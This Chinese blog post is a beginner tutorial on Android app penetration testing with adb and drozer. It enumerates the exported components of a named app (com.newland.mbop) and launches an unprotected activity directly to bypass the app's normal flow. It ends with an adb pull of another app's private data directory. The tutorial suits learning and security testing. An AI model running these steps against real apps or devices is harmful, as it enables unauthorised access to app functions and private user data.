• app测试初窥


    要用到的两个神器:abd&drozer

    adb介绍

    adb的全称为Android Debug Bridge,就是起到调试桥的作用,作为一名开发者倒是常用到这个工具.借助adb工具,我们可以管理设备或手机模拟器的状态。还可以进行很多手机操作,如安装软件、卸载软件、系统升级、运行shell命令等等。adb就是连接Android手机与PC端的桥梁,可以让用户在电脑上对手机进行全面的操作。

      drozer介绍

      Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。

    adb的连接:

    C:Usersdef>adb connect 127.0.0.1:62001  #端口一般都是62001或者52001
    already connected to 127.0.0.1:62001
    C:Usersdef>adb shell
    root@android:/ #

    drozer的连接:

      在使用drozer连接之前需要使用adb将pc的tcp31415端口和模拟器进行转发:命令:adb forward tcp:31415 tcp:31415

    D:drozer>drozer console connect
    Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.2)
    
                ..                    ..:.
               ..o..                  .r..
                ..a..  . ....... .  ..nd
                  ro..idsnemesisand..pr
                  .otectorandroidsneme.
               .,sisandprotectorandroids+.
             ..nemesisandprotectorandroidsn:.
            .emesisandprotectorandroidsnemes..
          ..isandp,..,rotectorandro,..,idsnem.
          .isisandp..rotectorandroid..snemisis.
          ,andprotectorandroidsnemisisandprotec.
         .torandroidsnemesisandprotectorandroid.
         .snemisisandprotectorandroidsnemesisan:
         .dprotectorandroidsnemesisandprotector.
    
    drozer Console (v2.3.4)
    dz>

    复现activity案例:

      首先你要了解什么是activity:https://baike.baidu.com/item/activity/7304419?fr=aladdin

    D:drozer>drozer console connect #连接
    Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.2)
    
                ..                    ..:.
               ..o..                  .r..
                ..a..  . ....... .  ..nd
                  ro..idsnemesisand..pr
                  .otectorandroidsneme.
               .,sisandprotectorandroids+.
             ..nemesisandprotectorandroidsn:.
            .emesisandprotectorandroidsnemes..
          ..isandp,..,rotectorandro,..,idsnem.
          .isisandp..rotectorandroid..snemisis.
          ,andprotectorandroidsnemisisandprotec.
         .torandroidsnemesisandprotectorandroid.
         .snemisisandprotectorandroidsnemesisan:
         .dprotectorandroidsnemesisandprotector.

    dz> run app.package.attacksurface com.newland.mbop #运行 攻击面模块 要攻击的app

    Attack Surface:
    8 activities exported #存在八个activity可以调用,activity就是可以越。
    2 broadcast receivers exported #存在2个broadcast receivers exported
    1 content providers exported #存在1个content providers exported
    2 services exported #存在2个services exported

    dz> run app.activity.info -a com.newland.mbop
    Package: com.newland.mbop
    com.newland.mbop.activity.WelcomeActivity #这个是存在漏洞的一个activity,第一个是欢迎界面。
    Permission: null
    com.newland.mbop.activity.PrintActivity
    Permission: null
    com.newland.mbop.activity.BankCardReaderActivity
    Permission: null
    com.newland.mbop.activity.IdentifyCardReaderActivity
    Permission: null
    com.newland.mbop.activity.SimReaderActivity
    Permission: null
    com.newland.mbop.activity.ReadIDCardInfoActivity
    Permission: null
    com.newland.mbop.component.barcode.zxing.CaptureActivity
    Permission: null
    com.igexin.sdk.GActivity
    Permission: null

    dz> run app.activity.start --component com.newland.mbop com.newland.mbop.activity.SimReaderActivity #命令执行完即完成攻击

    #app.activity.start是其攻击模块。

    #--component指定包

    #com.newland.mbop.activity.SimReaderActivity服务,使用app.activity.info的时候有显示出来。我选择了倒数第二个。

     

    将缓存文件导入到test目录

    adb pull /data/data/com.fjmcc.wangyoubao ./

  • 相关阅读:
    [译]reset, checkout和revert
    [译]merge vs rebase
    [译]使用branch
    [译]git push
    [译]git pull
    [译]git fetch
    [译]git remote
    Java RTTI机制与反射机制
    Java反射的一些理解
    Java中的异常处理:何时抛出异常,何时捕获异常?
  • 原文地址:https://www.cnblogs.com/xishaonian/p/7414027.html
Copyright © 2020-2023  润新知